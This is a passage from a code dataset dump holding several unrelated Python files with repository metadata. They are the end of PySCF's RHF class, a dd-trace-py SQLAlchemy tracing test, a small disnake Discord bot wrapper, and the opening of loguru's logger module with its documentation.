        mol = self.mol
        if mol.nelectron != 1 and mol.spin != 0:
            logger.warn(self, 'Invalid number of electrons %d for RHF method.',
                        mol.nelectron)
        return SCF.check_sanity(self)
    @lib.with_doc(get_jk.__doc__)
    def get_jk(self, mol=None, dm=None, hermi=1, with_j=True, with_k=True,
               omega=None):
        # Note the incore version, which initializes an _eri array in memory.
        if mol is None: mol = self.mol
        if dm is None: dm = self.make_rdm1()
        # Use in-memory AO ERIs when cached, forced, or affordable; omega
        # (range separation) always goes through the generic path.
        if (not omega and
            (self._eri is not None or mol.incore_anyway or self._is_mem_enough())):
            if self._eri is None:
                self._eri = mol.intor('int2e', aosym='s8')
            vj, vk = dot_eri_dm(self._eri, dm, hermi, with_j, with_k)
        else:
            vj, vk = SCF.get_jk(self, mol, dm, hermi, with_j, with_k, omega)
        return vj, vk
    @lib.with_doc(get_veff.__doc__)
    def get_veff(self, mol=None, dm=None, dm_last=0, vhf_last=0, hermi=1):
        # Hartree-Fock potential J - K/2; incremental build under direct SCF.
        if mol is None: mol = self.mol
        if dm is None: dm = self.make_rdm1()
        if self._eri is not None or not self.direct_scf:
            vj, vk = self.get_jk(mol, dm, hermi)
            vhf = vj - vk * .5
        else:
            # Contract only the density difference and add the previous
            # potential back (prescreening-friendly incremental Fock build).
            ddm = numpy.asarray(dm) - numpy.asarray(dm_last)
            vj, vk = self.get_jk(mol, ddm, hermi)
            vhf = vj - vk * .5
            vhf += numpy.asarray(vhf_last)
        return vhf
    def convert_from_(self, mf):
        '''Convert the input mean-field object to RHF/ROHF'''
        from pyscf.scf import addons
        return addons.convert_to_rhf(mf, out=self)
    def spin_square(self, mo_coeff=None, s=None): # pragma: no cover
        '''Spin square and multiplicity of RHF determinant'''
        # A closed-shell determinant always has <S^2> = 0, multiplicity 1.
        return 0, 1
    def stability(self,
                  internal=getattr(__config__, 'scf_stability_internal', True),
                  external=getattr(__config__, 'scf_stability_external', False),
                  verbose=None):
        '''
        RHF/RKS stability analysis.
        See also pyscf.scf.stability.rhf_stability function.
        Kwargs:
            internal : bool
                Internal stability, within the RHF optimization space.
            external : bool
                External stability. Including the RHF -> UHF and real -> complex
                stability analysis.
        Returns:
            New orbitals that are more close to the stable condition. The return
            value includes two set of orbitals. The first corresponds to the
            internal stability and the second corresponds to the external stability.
        '''
        from pyscf.scf.stability import rhf_stability
        return rhf_stability(self, internal, external, verbose)
    def nuc_grad_method(self):
        # Analytical nuclear gradients for RHF.
        from pyscf.grad import rhf
        return rhf.Gradients(self)
del(WITH_META_LOWDIN, PRE_ORTH_METHOD)
if __name__ == '__main__':
    from pyscf import scf
    # Minimal smoke test: He atom in cc-pVDZ, RHF decorated with X2C,
    # density fitting and the Newton (second-order) solver, starting
    # from the 1e (hcore) initial guess.
    mol = gto.Mole()
    mol.verbose = 5
    mol.output = None
    mol.atom = [['He', (0, 0, 0)], ]
    mol.basis = 'ccpvdz'
    mol.build(0, 0)
    ##############
    # SCF result
    method = scf.RHF(mol).x2c().density_fit().newton()
    method.init_guess = '1e'
    energy = method.scf()
    print(energy)
| 35.552964
| 104
| 0.597775
|
4a1124873aa39b3bdef22d6f64e413bbfc80a345
| 4,079
|
py
|
Python
|
tests/contrib/sqlalchemy/test_patch.py
|
mbmblbelt/dd-trace-py
|
906fb7fa91d0ed59d263df74e14aacc8b2d70251
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/contrib/sqlalchemy/test_patch.py
|
mbmblbelt/dd-trace-py
|
906fb7fa91d0ed59d263df74e14aacc8b2d70251
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
tests/contrib/sqlalchemy/test_patch.py
|
mbmblbelt/dd-trace-py
|
906fb7fa91d0ed59d263df74e14aacc8b2d70251
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
import sqlalchemy
from ddtrace import Pin
from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY
from ddtrace.contrib.sqlalchemy import patch
from ddtrace.contrib.sqlalchemy import unpatch
from ... import TracerTestCase
from ... import assert_is_measured
from ..config import POSTGRES_CONFIG
class SQLAlchemyPatchTestCase(TracerTestCase):
    """TestCase that checks if the engine is properly traced
    when the `patch()` method is used.
    """
    def setUp(self):
        # Patch sqlalchemy globally, build a Postgres engine from the test
        # config, attach the test tracer via Pin, and open one connection.
        super(SQLAlchemyPatchTestCase, self).setUp()
        # create a traced engine with the given arguments
        # and configure the current PIN instance
        patch()
        dsn = 'postgresql://%(user)s:%(password)s@%(host)s:%(port)s/%(dbname)s' % POSTGRES_CONFIG
        self.engine = sqlalchemy.create_engine(dsn)
        Pin.override(self.engine, tracer=self.tracer)
        # prepare a connection
        self.conn = self.engine.connect()
    def tearDown(self):
        # Close the connection, dispose the engine and undo the global patch
        # so tests remain isolated.
        super(SQLAlchemyPatchTestCase, self).tearDown()
        # clear the database and dispose the engine
        self.conn.close()
        self.engine.dispose()
        unpatch()
    def test_engine_traced(self):
        # ensures that the engine is traced
        rows = self.conn.execute('SELECT 1').fetchall()
        assert len(rows) == 1
        traces = self.tracer.writer.pop_traces()
        # trace composition
        assert len(traces) == 1
        assert len(traces[0]) == 1
        span = traces[0][0]
        # check subset of span fields
        assert_is_measured(span)
        assert span.name == 'postgres.query'
        assert span.service == 'postgres'
        assert span.error == 0
        assert span.duration > 0
    def test_engine_pin_service(self):
        # ensures that the engine service is updated with the PIN object
        Pin.override(self.engine, service='replica-db')
        rows = self.conn.execute('SELECT 1').fetchall()
        assert len(rows) == 1
        traces = self.tracer.writer.pop_traces()
        # trace composition
        assert len(traces) == 1
        assert len(traces[0]) == 1
        span = traces[0][0]
        # check subset of span fields
        assert_is_measured(span)
        assert span.name == 'postgres.query'
        assert span.service == 'replica-db'
        assert span.error == 0
        assert span.duration > 0
    def test_analytics_sample_rate(self):
        # Exercises every combination of analytics_enabled/analytics_sample_rate
        # and checks the resulting span metric.
        # [ <config>, <analytics sample rate metric value> ]
        matrix = [
            # Default, not enabled, not set
            [dict(), None],
            # Not enabled, but sample rate set
            [dict(analytics_sample_rate=0.5), None],
            # Enabled and rate set
            [dict(analytics_enabled=True, analytics_sample_rate=0.5), 0.5],
            [dict(analytics_enabled=True, analytics_sample_rate=1), 1.0],
            [dict(analytics_enabled=True, analytics_sample_rate=0), 0],
            [dict(analytics_enabled=True, analytics_sample_rate=True), 1.0],
            [dict(analytics_enabled=True, analytics_sample_rate=False), 0],
            # Disabled and rate set
            [dict(analytics_enabled=False, analytics_sample_rate=0.5), None],
            # Enabled and rate not set
            [dict(analytics_enabled=True), 1.0],
        ]
        for config, metric_value in matrix:
            with self.override_config('sqlalchemy', config):
                self.conn.execute('SELECT 1').fetchall()
                root = self.get_root_span()
                assert_is_measured(root)
                root.assert_matches(name='postgres.query')
                # If the value is None assert it was not set, otherwise assert the expected value
                # DEV: root.assert_metrics(metrics, exact=True) won't work here since we have another sample
                #      rate keys getting added
                if metric_value is None:
                    assert ANALYTICS_SAMPLE_RATE_KEY not in root.metrics
                else:
                    assert root.metrics[ANALYTICS_SAMPLE_RATE_KEY] == metric_value
                self.reset()
| 36.747748
| 108
| 0.619024
|
4a1125cc680ae42d54571abd694b863b5e7ed14a
| 716
|
py
|
Python
|
src/internal/bot.py
|
gtaodiscord/modmail
|
9584f29aff57969368310f56f3f75e3e0b889b11
|
[
"MIT"
] | null | null | null |
src/internal/bot.py
|
gtaodiscord/modmail
|
9584f29aff57969368310f56f3f75e3e0b889b11
|
[
"MIT"
] | null | null | null |
src/internal/bot.py
|
gtaodiscord/modmail
|
9584f29aff57969368310f56f3f75e3e0b889b11
|
[
"MIT"
] | null | null | null |
from disnake import Intents
from disnake.ext.commands import Bot as _BotBase
from loguru import logger
from src.utils import get_config
class Bot(_BotBase):
    # Discord bot wrapper: loads config, enables the members intent and
    # logs the connect / ready / resume lifecycle events.
    def __init__(self, *args, **kwargs) -> None:
        self.config = get_config()
        # Members intent is required on top of the defaults
        # (presumably for member lookups elsewhere -- confirm).
        intents = Intents.default()
        intents.members = True
        super().__init__(
            intents=intents, command_prefix=self.config.prefix, *args, **kwargs
        )
    @staticmethod
    async def on_connect() -> None:
        # Gateway connection established.
        logger.info("Connected to Discord.")
    @staticmethod
    async def on_ready() -> None:
        # Initial state sync complete; the bot can serve commands.
        logger.info("Bot is ready.")
    @staticmethod
    async def on_resume() -> None:
        # Session resumed after a transient disconnect.
        logger.warning("Bot has resumed.")
| 23.866667
| 79
| 0.641061
|
4a1125f495dc5a809aecaa1fdc24d6457dae3fd6
| 92,735
|
py
|
Python
|
loguru/_logger.py
|
phillipuniverse/loguru
|
3d5234541c81318e7f6f725eca7bab294fe09c23
|
[
"MIT"
] | 11,391
|
2018-12-08T17:44:13.000Z
|
2022-03-31T17:55:24.000Z
|
loguru/_logger.py
|
vkirilenko/loguru
|
68616485f4f0decb5fced36a16040f5e05e2842f
|
[
"MIT"
] | 610
|
2018-12-08T18:03:03.000Z
|
2022-03-31T22:28:14.000Z
|
loguru/_logger.py
|
vkirilenko/loguru
|
68616485f4f0decb5fced36a16040f5e05e2842f
|
[
"MIT"
] | 601
|
2018-12-08T17:46:42.000Z
|
2022-03-30T04:23:56.000Z
|
"""
.. References and links rendered by Sphinx are kept here as "module documentation" so that they can
be used in the ``Logger`` docstrings but do not pollute ``help(logger)`` output.
.. |Logger| replace:: :class:`~Logger`
.. |add| replace:: :meth:`~Logger.add()`
.. |remove| replace:: :meth:`~Logger.remove()`
.. |complete| replace:: :meth:`~Logger.complete()`
.. |catch| replace:: :meth:`~Logger.catch()`
.. |bind| replace:: :meth:`~Logger.bind()`
.. |contextualize| replace:: :meth:`~Logger.contextualize()`
.. |patch| replace:: :meth:`~Logger.patch()`
.. |opt| replace:: :meth:`~Logger.opt()`
.. |log| replace:: :meth:`~Logger.log()`
.. |level| replace:: :meth:`~Logger.level()`
.. |enable| replace:: :meth:`~Logger.enable()`
.. |disable| replace:: :meth:`~Logger.disable()`
.. |str| replace:: :class:`str`
.. |int| replace:: :class:`int`
.. |bool| replace:: :class:`bool`
.. |tuple| replace:: :class:`tuple`
.. |namedtuple| replace:: :func:`namedtuple<collections.namedtuple>`
.. |list| replace:: :class:`list`
.. |dict| replace:: :class:`dict`
.. |str.format| replace:: :meth:`str.format()`
.. |Path| replace:: :class:`pathlib.Path`
.. |match.groupdict| replace:: :meth:`re.Match.groupdict()`
.. |Handler| replace:: :class:`logging.Handler`
.. |sys.stderr| replace:: :data:`sys.stderr`
.. |sys.exc_info| replace:: :func:`sys.exc_info()`
.. |time| replace:: :class:`datetime.time`
.. |datetime| replace:: :class:`datetime.datetime`
.. |timedelta| replace:: :class:`datetime.timedelta`
.. |open| replace:: :func:`open()`
.. |logging| replace:: :mod:`logging`
.. |signal| replace:: :mod:`signal`
.. |contextvars| replace:: :mod:`contextvars`
.. |Thread.run| replace:: :meth:`Thread.run()<threading.Thread.run()>`
.. |Exception| replace:: :class:`Exception`
.. |locale.getpreferredencoding| replace:: :func:`locale.getpreferredencoding()`
.. |AbstractEventLoop| replace:: :class:`AbstractEventLoop<asyncio.AbstractEventLoop>`
.. |asyncio.get_event_loop| replace:: :func:`asyncio.get_event_loop()`
.. |asyncio.run| replace:: :func:`asyncio.run()`
.. |loop.run_until_complete| replace::
:meth:`loop.run_until_complete()<asyncio.loop.run_until_complete()>`
.. |loop.create_task| replace:: :meth:`loop.create_task()<asyncio.loop.create_task()>`
.. |logger.trace| replace:: :meth:`logger.trace()<Logger.trace()>`
.. |logger.debug| replace:: :meth:`logger.debug()<Logger.debug()>`
.. |logger.info| replace:: :meth:`logger.info()<Logger.info()>`
.. |logger.success| replace:: :meth:`logger.success()<Logger.success()>`
.. |logger.warning| replace:: :meth:`logger.warning()<Logger.warning()>`
.. |logger.error| replace:: :meth:`logger.error()<Logger.error()>`
.. |logger.critical| replace:: :meth:`logger.critical()<Logger.critical()>`
.. |file-like object| replace:: ``file-like object``
.. _file-like object: https://docs.python.org/3/glossary.html#term-file-object
.. |callable| replace:: ``callable``
.. _callable: https://docs.python.org/3/library/functions.html#callable
.. |coroutine function| replace:: ``coroutine function``
.. _coroutine function: https://docs.python.org/3/glossary.html#term-coroutine-function
.. |re.Pattern| replace:: ``re.Pattern``
.. _re.Pattern: https://docs.python.org/3/library/re.html#re-objects
.. |better_exceptions| replace:: ``better_exceptions``
.. _better_exceptions: https://github.com/Qix-/better-exceptions
.. _Pendulum: https://pendulum.eustace.io/docs/#tokens
.. _@sdispater: https://github.com/sdispater
.. _@Qix-: https://github.com/Qix-
.. _Formatting directives: https://docs.python.org/3/library/string.html#format-string-syntax
.. _reentrant: https://en.wikipedia.org/wiki/Reentrancy_(computing)
"""
import asyncio
import builtins
import contextlib
import functools
import itertools
import logging
import re
import sys
import warnings
from collections import namedtuple
from inspect import isclass, iscoroutinefunction, isgeneratorfunction
from multiprocessing import current_process
from os.path import basename, splitext
from threading import current_thread
from . import _colorama, _defaults, _filters
from ._better_exceptions import ExceptionFormatter
from ._colorizer import Colorizer
from ._datetime import aware_now
from ._error_interceptor import ErrorInterceptor
from ._file_sink import FileSink
from ._get_frame import get_frame
from ._handler import Handler
from ._locks_machinery import create_logger_lock
from ._recattrs import RecordException, RecordFile, RecordLevel, RecordProcess, RecordThread
from ._simple_sinks import AsyncSink, CallableSink, StandardSink, StreamSink
if sys.version_info >= (3, 6):
from os import PathLike
else:
from pathlib import PurePath as PathLike
if sys.version_info >= (3, 7):
from contextvars import ContextVar
elif sys.version_info >= (3, 5, 3):
from aiocontextvars import ContextVar
else:
from contextvars import ContextVar
# Severity level descriptor: display name, numeric threshold, color markup, icon.
Level = namedtuple("Level", ["name", "no", "color", "icon"])
# Instant of module import; presumably the reference for elapsed-time fields
# in log records -- confirm against the record construction code.
start_time = aware_now()
# Context-local storage seeded empty; per the module docs, populated by
# Logger.contextualize().
context = ContextVar("loguru_context", default={})
class Core:
    """Mutable state shared by every ``Logger`` handle: the level table,
    registered handlers, enable/disable registry and the protecting lock."""
    def __init__(self):
        # Built-in severity levels with their default numbers, colors, icons.
        levels = [
            Level(
                "TRACE",
                _defaults.LOGURU_TRACE_NO,
                _defaults.LOGURU_TRACE_COLOR,
                _defaults.LOGURU_TRACE_ICON,
            ),
            Level(
                "DEBUG",
                _defaults.LOGURU_DEBUG_NO,
                _defaults.LOGURU_DEBUG_COLOR,
                _defaults.LOGURU_DEBUG_ICON,
            ),
            Level(
                "INFO",
                _defaults.LOGURU_INFO_NO,
                _defaults.LOGURU_INFO_COLOR,
                _defaults.LOGURU_INFO_ICON,
            ),
            Level(
                "SUCCESS",
                _defaults.LOGURU_SUCCESS_NO,
                _defaults.LOGURU_SUCCESS_COLOR,
                _defaults.LOGURU_SUCCESS_ICON,
            ),
            Level(
                "WARNING",
                _defaults.LOGURU_WARNING_NO,
                _defaults.LOGURU_WARNING_COLOR,
                _defaults.LOGURU_WARNING_ICON,
            ),
            Level(
                "ERROR",
                _defaults.LOGURU_ERROR_NO,
                _defaults.LOGURU_ERROR_COLOR,
                _defaults.LOGURU_ERROR_ICON,
            ),
            Level(
                "CRITICAL",
                _defaults.LOGURU_CRITICAL_NO,
                _defaults.LOGURU_CRITICAL_COLOR,
                _defaults.LOGURU_CRITICAL_ICON,
            ),
        ]
        self.levels = {level.name: level for level in levels}
        # Pre-computed ANSI codes per level name; the None key maps to "".
        self.levels_ansi_codes = {
            name: Colorizer.ansify(level.color) for name, level in self.levels.items()
        }
        self.levels_ansi_codes[None] = ""
        # Monotonically increasing ids for handlers added via Logger.add().
        self.handlers_count = itertools.count()
        self.handlers = {}
        self.extra = {}
        self.patcher = None
        # Lowest level across handlers; inf means "no handler accepts anything".
        self.min_level = float("inf")
        self.enabled = {}
        self.activation_list = []
        self.activation_none = True
        self.lock = create_logger_lock()
    def __getstate__(self):
        # The lock is not picklable: drop it and recreate it on unpickling.
        state = self.__dict__.copy()
        state["lock"] = None
        return state
    def __setstate__(self, state):
        self.__dict__.update(state)
        self.lock = create_logger_lock()
class Logger:
"""An object to dispatch logging messages to configured handlers.
The |Logger| is the core object of ``loguru``, every logging configuration and usage pass
through a call to one of its methods. There is only one logger, so there is no need to retrieve
one before usage.
Once the ``logger`` is imported, it can be used to write messages about events happening in your
code. By reading the output logs of your application, you gain a better understanding of the
flow of your program and you more easily track and debug unexpected behaviors.
Handlers to which the logger sends log messages are added using the |add| method. Note that you
can use the |Logger| right after import as it comes pre-configured (logs are emitted to
|sys.stderr| by default). Messages can be logged with different severity levels and using braces
attributes like the |str.format| method do.
When a message is logged, a "record" is associated with it. This record is a dict which contains
information about the logging context: time, function, file, line, thread, level... It also
contains the ``__name__`` of the module, this is why you don't need named loggers.
You should not instantiate a |Logger| by yourself, use ``from loguru import logger`` instead.
"""
    def __init__(self, core, exception, depth, record, lazy, colors, raw, capture, patcher, extra):
        # ``core`` is the state shared by every Logger handle; ``_options`` is
        # the per-handle option tuple (presumably produced by opt()/bind()/
        # patch() -- confirm against those methods).
        self._core = core
        self._options = (exception, depth, record, lazy, colors, raw, capture, patcher, extra)
    def __repr__(self):
        # Debug representation listing the currently registered handlers.
        return "<loguru.logger handlers=%r>" % list(self._core.handlers.values())
def add(
    self,
    sink,
    *,
    level=_defaults.LOGURU_LEVEL,
    format=_defaults.LOGURU_FORMAT,
    filter=_defaults.LOGURU_FILTER,
    colorize=_defaults.LOGURU_COLORIZE,
    serialize=_defaults.LOGURU_SERIALIZE,
    backtrace=_defaults.LOGURU_BACKTRACE,
    diagnose=_defaults.LOGURU_DIAGNOSE,
    enqueue=_defaults.LOGURU_ENQUEUE,
    catch=_defaults.LOGURU_CATCH,
    **kwargs
):
    r"""Add a handler sending log messages to a sink adequately configured.

    Parameters
    ----------
    sink : |file-like object|_, |str|, |Path|, |callable|_, |coroutine function|_ or |Handler|
        An object in charge of receiving formatted logging messages and propagating them to an
        appropriate endpoint.
    level : |int| or |str|, optional
        The minimum severity level from which logged messages should be sent to the sink.
    format : |str| or |callable|_, optional
        The template used to format logged messages before being sent to the sink.
    filter : |callable|_, |str| or |dict|, optional
        A directive optionally used to decide for each logged message whether it should be sent
        to the sink or not.
    colorize : |bool|, optional
        Whether the color markups contained in the formatted message should be converted to ansi
        codes for terminal coloration, or stripped otherwise. If ``None``, the choice is
        automatically made based on the sink being a tty or not.
    serialize : |bool|, optional
        Whether the logged message and its records should be first converted to a JSON string
        before being sent to the sink.
    backtrace : |bool|, optional
        Whether the exception trace formatted should be extended upward, beyond the catching
        point, to show the full stacktrace which generated the error.
    diagnose : |bool|, optional
        Whether the exception trace should display the variables values to eases the debugging.
        This should be set to ``False`` in production to avoid leaking sensitive data.
    enqueue : |bool|, optional
        Whether the messages to be logged should first pass through a multiprocess-safe queue
        before reaching the sink. This is useful while logging to a file through multiple
        processes. This also has the advantage of making logging calls non-blocking.
    catch : |bool|, optional
        Whether errors occurring while sink handles logs messages should be automatically
        caught. If ``True``, an exception message is displayed on |sys.stderr| but the exception
        is not propagated to the caller, preventing your app to crash.
    **kwargs
        Additional parameters that are only valid to configure a coroutine or file sink (see
        below).

    If and only if the sink is a coroutine function, the following parameter applies:

    Parameters
    ----------
    loop : |AbstractEventLoop|, optional
        The event loop in which the asynchronous logging task will be scheduled and executed. If
        ``None``, the loop returned by |asyncio.get_event_loop| is used.

    If and only if the sink is a file path, the following parameters apply:

    Parameters
    ----------
    rotation : |str|, |int|, |time|, |timedelta| or |callable|_, optional
        A condition indicating whenever the current logged file should be closed and a new one
        started.
    retention : |str|, |int|, |timedelta| or |callable|_, optional
        A directive filtering old files that should be removed during rotation or end of
        program.
    compression : |str| or |callable|_, optional
        A compression or archive format to which log files should be converted at closure.
    delay : |bool|, optional
        Whether the file should be created as soon as the sink is configured, or delayed until
        first logged message. It defaults to ``False``.
    mode : |str|, optional
        The opening mode as for built-in |open| function. It defaults to ``"a"`` (open the
        file in appending mode).
    buffering : |int|, optional
        The buffering policy as for built-in |open| function. It defaults to ``1`` (line
        buffered file).
    encoding : |str|, optional
        The file encoding as for built-in |open| function. If ``None``, it defaults to
        |locale.getpreferredencoding|.
    **kwargs
        Others parameters are passed to the built-in |open| function.

    Returns
    -------
    :class:`int`
        An identifier associated with the added sink and which should be used to
        |remove| it.

    Notes
    -----
    Extended summary follows.

    .. _sink:

    .. rubric:: The sink parameter

    The ``sink`` handles incoming log messages and proceed to their writing somewhere and
    somehow. A sink can take many forms:

    - A |file-like object|_ like ``sys.stderr`` or ``open("somefile.log", "w")``. Anything with
      a ``.write()`` method is considered as a file-like object. Custom handlers may also
      implement ``flush()`` (called after each logged message), ``stop()`` (called at sink
      termination) and ``complete()`` (awaited by the eponymous method).
    - A file path as |str| or |Path|. It can be parametrized with some additional parameters,
      see below.
    - A |callable|_ (such as a simple function) like ``lambda msg: print(msg)``. This
      allows for logging procedure entirely defined by user preferences and needs.
    - A asynchronous |coroutine function|_ defined with the ``async def`` statement. The
      coroutine object returned by such function will be added to the event loop using
      |loop.create_task|. The tasks should be awaited before ending the loop by using
      |complete|.
    - A built-in |Handler| like ``logging.StreamHandler``. In such a case, the `Loguru` records
      are automatically converted to the structure expected by the |logging| module.

    Note that the logging functions are not `reentrant`_. This means you should avoid using
    the ``logger`` inside any of your sinks or from within |signal| handlers. Otherwise, you
    may face deadlock if the module's sink was not explicitly disabled.

    .. _message:

    .. rubric:: The logged message

    The logged message passed to all added sinks is nothing more than a string of the
    formatted log, to which a special attribute is associated: the ``.record`` which is a dict
    containing all contextual information possibly needed (see below).

    Logged messages are formatted according to the ``format`` of the added sink. This format
    is usually a string containing braces fields to display attributes from the record dict.

    If fine-grained control is needed, the ``format`` can also be a function which takes the
    record as parameter and return the format template string. However, note that in such a
    case, you should take care of appending the line ending and exception field to the returned
    format, while ``"\n{exception}"`` is automatically appended for convenience if ``format`` is
    a string.

    The ``filter`` attribute can be used to control which messages are effectively passed to the
    sink and which one are ignored. A function can be used, accepting the record as an
    argument, and returning ``True`` if the message should be logged, ``False`` otherwise. If
    a string is used, only the records with the same ``name`` and its children will be allowed.
    One can also pass a ``dict`` mapping module names to minimum required level. In such case,
    each log record will search for it's closest parent in the ``dict`` and use the associated
    level as the filter. The ``dict`` values can be ``int`` severity, ``str`` level name or
    ``True`` and ``False`` to respectively authorize and discard all module logs
    unconditionally. In order to set a default level, the ``""`` module name should be used as
    it is the parent of all modules (it does not suppress global ``level`` threshold, though).

    Note that while calling a logging method, the keyword arguments (if any) are automatically
    added to the ``extra`` dict for convenient contextualization (in addition to being used for
    formatting).

    .. _levels:

    .. rubric:: The severity levels

    Each logged message is associated with a severity level. These levels make it possible to
    prioritize messages and to choose the verbosity of the logs according to usages. For
    example, it allows to display some debugging information to a developer, while hiding it to
    the end user running the application.

    The ``level`` attribute of every added sink controls the minimum threshold from which log
    messages are allowed to be emitted. While using the ``logger``, you are in charge of
    configuring the appropriate granularity of your logs. It is possible to add even more custom
    levels by using the |level| method.

    Here are the standard levels with their default severity value, each one is associated with
    a logging method of the same name:

    +----------------------+------------------------+------------------------+
    | Level name           | Severity value         | Logger method          |
    +======================+========================+========================+
    | ``TRACE``            | 5                      | |logger.trace|         |
    +----------------------+------------------------+------------------------+
    | ``DEBUG``            | 10                     | |logger.debug|         |
    +----------------------+------------------------+------------------------+
    | ``INFO``             | 20                     | |logger.info|          |
    +----------------------+------------------------+------------------------+
    | ``SUCCESS``          | 25                     | |logger.success|       |
    +----------------------+------------------------+------------------------+
    | ``WARNING``          | 30                     | |logger.warning|       |
    +----------------------+------------------------+------------------------+
    | ``ERROR``            | 40                     | |logger.error|         |
    +----------------------+------------------------+------------------------+
    | ``CRITICAL``         | 50                     | |logger.critical|      |
    +----------------------+------------------------+------------------------+

    .. _record:

    .. rubric:: The record dict

    The record is just a Python dict, accessible from sinks by ``message.record``. It contains
    all contextual information of the logging call (time, function, file, line, level, etc.).

    Each of its key can be used in the handler's ``format`` so the corresponding value is
    properly displayed in the logged message (e.g. ``"{level}"`` -> ``"INFO"``). Some record's
    values are objects with two or more attributes, these can be formatted with ``"{key.attr}"``
    (``"{key}"`` would display one by default). `Formatting directives`_ like ``"{key: >3}"``
    also works and is particularly useful for time (see below).

    +------------+---------------------------------+----------------------------+
    | Key        | Description                     | Attributes                 |
    +============+=================================+============================+
    | elapsed    | The time elapsed since the      | See |timedelta|            |
    |            | start of the program            |                            |
    +------------+---------------------------------+----------------------------+
    | exception  | The formatted exception if any, | ``type``, ``value``,       |
    |            | ``None`` otherwise              | ``traceback``              |
    +------------+---------------------------------+----------------------------+
    | extra      | The dict of attributes          | None                       |
    |            | bound by the user (see |bind|)  |                            |
    +------------+---------------------------------+----------------------------+
    | file       | The file where the logging call | ``name`` (default),        |
    |            | was made                        | ``path``                   |
    +------------+---------------------------------+----------------------------+
    | function   | The function from which the     | None                       |
    |            | logging call was made           |                            |
    +------------+---------------------------------+----------------------------+
    | level      | The severity used to log the    | ``name`` (default),        |
    |            | message                         | ``no``, ``icon``           |
    +------------+---------------------------------+----------------------------+
    | line       | The line number in the source   | None                       |
    |            | code                            |                            |
    +------------+---------------------------------+----------------------------+
    | message    | The logged message (not yet     | None                       |
    |            | formatted)                      |                            |
    +------------+---------------------------------+----------------------------+
    | module     | The module where the logging    | None                       |
    |            | call was made                   |                            |
    +------------+---------------------------------+----------------------------+
    | name       | The ``__name__`` where the      | None                       |
    |            | logging call was made           |                            |
    +------------+---------------------------------+----------------------------+
    | process    | The process in which the        | ``name``, ``id`` (default) |
    |            | logging call was made           |                            |
    +------------+---------------------------------+----------------------------+
    | thread     | The thread in which the         | ``name``, ``id`` (default) |
    |            | logging call was made           |                            |
    +------------+---------------------------------+----------------------------+
    | time       | The aware local time when the   | See |datetime|             |
    |            | logging call was made           |                            |
    +------------+---------------------------------+----------------------------+

    .. _time:

    .. rubric:: The time formatting

    To use your favorite time representation, you can set it directly in the time formatter
    specifier of your handler format, like for example ``format="{time:HH:mm:ss} {message}"``.
    Note that this datetime represents your local time, and it is also made timezone-aware,
    so you can display the UTC offset to avoid ambiguities.

    The time field can be formatted using more human-friendly tokens. These constitute a subset
    of the one used by the `Pendulum`_ library of `@sdispater`_. To escape a token, just add
    square brackets around it, for example ``"[YY]"`` would display literally ``"YY"``.

    If you prefer to display UTC rather than local time, you can add ``"!UTC"`` at the very end
    of the time format, like ``{time:HH:mm:ss!UTC}``. Doing so will convert the ``datetime``
    to UTC before formatting.

    If no time formatter specifier is used, like for example if ``format="{time} {message}"``,
    the default one will use ISO 8601.

    +------------------------+---------+----------------------------------------+
    |                        | Token   | Output                                 |
    +========================+=========+========================================+
    | Year                   | YYYY    | 2000, 2001, 2002 ... 2012, 2013        |
    |                        +---------+----------------------------------------+
    |                        | YY      | 00, 01, 02 ... 12, 13                  |
    +------------------------+---------+----------------------------------------+
    | Quarter                | Q       | 1 2 3 4                                |
    +------------------------+---------+----------------------------------------+
    | Month                  | MMMM    | January, February, March ...           |
    |                        +---------+----------------------------------------+
    |                        | MMM     | Jan, Feb, Mar ...                      |
    |                        +---------+----------------------------------------+
    |                        | MM      | 01, 02, 03 ... 11, 12                  |
    |                        +---------+----------------------------------------+
    |                        | M       | 1, 2, 3 ... 11, 12                     |
    +------------------------+---------+----------------------------------------+
    | Day of Year            | DDDD    | 001, 002, 003 ... 364, 365             |
    |                        +---------+----------------------------------------+
    |                        | DDD     | 1, 2, 3 ... 364, 365                   |
    +------------------------+---------+----------------------------------------+
    | Day of Month           | DD      | 01, 02, 03 ... 30, 31                  |
    |                        +---------+----------------------------------------+
    |                        | D       | 1, 2, 3 ... 30, 31                     |
    +------------------------+---------+----------------------------------------+
    | Day of Week            | dddd    | Monday, Tuesday, Wednesday ...         |
    |                        +---------+----------------------------------------+
    |                        | ddd     | Mon, Tue, Wed ...                      |
    |                        +---------+----------------------------------------+
    |                        | d       | 0, 1, 2 ... 6                          |
    +------------------------+---------+----------------------------------------+
    | Days of ISO Week       | E       | 1, 2, 3 ... 7                          |
    +------------------------+---------+----------------------------------------+
    | Hour                   | HH      | 00, 01, 02 ... 23, 24                  |
    |                        +---------+----------------------------------------+
    |                        | H       | 0, 1, 2 ... 23, 24                     |
    |                        +---------+----------------------------------------+
    |                        | hh      | 01, 02, 03 ... 11, 12                  |
    |                        +---------+----------------------------------------+
    |                        | h       | 1, 2, 3 ... 11, 12                     |
    +------------------------+---------+----------------------------------------+
    | Minute                 | mm      | 00, 01, 02 ... 58, 59                  |
    |                        +---------+----------------------------------------+
    |                        | m       | 0, 1, 2 ... 58, 59                     |
    +------------------------+---------+----------------------------------------+
    | Second                 | ss      | 00, 01, 02 ... 58, 59                  |
    |                        +---------+----------------------------------------+
    |                        | s       | 0, 1, 2 ... 58, 59                     |
    +------------------------+---------+----------------------------------------+
    | Fractional Second      | S       | 0 1 ... 8 9                            |
    |                        +---------+----------------------------------------+
    |                        | SS      | 00, 01, 02 ... 98, 99                  |
    |                        +---------+----------------------------------------+
    |                        | SSS     | 000 001 ... 998 999                    |
    |                        +---------+----------------------------------------+
    |                        | SSSS... | 000[0..] 001[0..] ... 998[0..] 999[0..]|
    |                        +---------+----------------------------------------+
    |                        | SSSSSS  | 000000 000001 ... 999998 999999        |
    +------------------------+---------+----------------------------------------+
    | AM / PM                | A       | AM, PM                                 |
    +------------------------+---------+----------------------------------------+
    | Timezone               | Z       | -07:00, -06:00 ... +06:00, +07:00      |
    |                        +---------+----------------------------------------+
    |                        | ZZ      | -0700, -0600 ... +0600, +0700          |
    |                        +---------+----------------------------------------+
    |                        | zz      | EST CST ... MST PST                    |
    +------------------------+---------+----------------------------------------+
    | Seconds timestamp      | X       | 1381685817, 1234567890.123             |
    +------------------------+---------+----------------------------------------+
    | Microseconds timestamp | x       | 1234567890123                          |
